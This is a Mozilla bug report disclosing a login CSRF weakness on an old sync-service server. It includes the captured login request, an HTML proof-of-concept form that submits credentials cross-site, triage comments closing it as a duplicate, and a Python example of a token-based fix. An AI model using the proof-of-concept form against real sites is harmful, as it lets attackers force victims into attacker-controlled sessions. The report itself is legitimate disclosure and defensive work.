User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0
Build ID: 20140410211200

Steps to reproduce:

CSRF vulnerability in mozilla
URL : https://184.108.40.206/

The Login request does not have valid protection against CSRF attacks. Here is the request:

POST / HTTP/1.1
Host: 220.127.116.11
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://18.104.22.168/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

username=abhijeth0423%40gmail.com&password=testadmin

CSRF POC :

<html>
  <body>
    <form action="https://22.214.171.124/" method="POST">
      <input type="hidden" name="username" value="email@example.com" />
      <input type="hidden" name="password" value="testadmin" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Actual results:

Using the above vulnerability an attacker can make the victim log in to some test account and then observe the changes or actions made by the victim. This is prevented by using either an authenticated token or CSRF token.

Expected results:

The Login form needs to be protected with an authentication token as one of the parameters in the Login form. This will prevent CSRF vulnerability.
Assignee: nobody → server-ops
Component: General → Server Operations
Product: Core → mozilla.org
QA Contact: shyam
Version: 28 Branch → other
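To make the mitigation the report asks for concrete, here is an added Python example (not code from Mozilla or from this bug) of a login form protected with a per-session CSRF token: the server issues an anonymous pre-login session cookie, derives a form token from it with an HMAC, and rejects any login POST whose token does not match. The secret key, cookie handling and function names are assumptions for the example; the POC body is the attacker form from the report.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs

# Server-side key; generated per process here only for the example.
SECRET_KEY = secrets.token_bytes(32)

# The attacker's form from the report: username and password, no CSRF token.
POC_BODY = "username=email%40example.com&password=testadmin"


def login_accepted_unprotected(form_body):
    """Behaviour the report describes: any POST with both fields is accepted."""
    fields = parse_qs(form_body)
    return "username" in fields and "password" in fields


def new_pre_login_session():
    """Anonymous session id set in a cookie when the login page is served."""
    return secrets.token_urlsafe(32)


def csrf_token_for(session_id):
    """Form token bound to the session; the attacker cannot compute it without the key."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def render_login_form(session_id):
    """Login form carrying the token as a hidden field (the fix the reporter asks for)."""
    return (
        '<form action="/" method="POST">'
        f'<input type="hidden" name="csrf_token" value="{csrf_token_for(session_id)}" />'
        '<input name="username" /><input name="password" type="password" />'
        '<input type="submit" value="Log in" /></form>'
    )


def validate_login_post(cookie_session_id, form_body):
    """Accept the login POST only if its csrf_token matches the cookie's session."""
    fields = parse_qs(form_body, keep_blank_values=True)
    token = fields.get("csrf_token", [""])[0]
    if not cookie_session_id or not token:
        return False  # cross-site form (like the POC) has no token at all
    return hmac.compare_digest(csrf_token_for(cookie_session_id), token)


if __name__ == "__main__":
    sid = new_pre_login_session()
    print("unprotected accepts POC:", login_accepted_unprotected(POC_BODY))  # True
    print("protected accepts POC:", validate_login_post(sid, POC_BODY))  # False
```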
Please add sec-bounty flag! Regards
As best I can tell this is the old sync service, and signing in with a test account on the web won't do anything in terms of actually syncing anything behaviour-wise. I also see an SSL cert warning if I use the instructions as written, because the IP address doesn't match the cert. Going to https://services.mozilla.com/ doesn't show the same page as ignoring the cert warning. In other words, I'm not sure there's anything to be worried about here. Richard, can you clarify some more?
Yeah, that machine is account01.phx.services.mozilla.com, which will be decommissioned soon. And this is a dupe.
Status: UNCONFIRMED → RESOLVED
Last Resolved: 4 years ago
Resolution: --- → DUPLICATE
Summary: CSRF vulnerability in mozilla subd-domain → CSRF vulnerability in accounts.services.mozilla.com
Duplicate of bug: 772818
Product: mozilla.org → mozilla.org Graveyard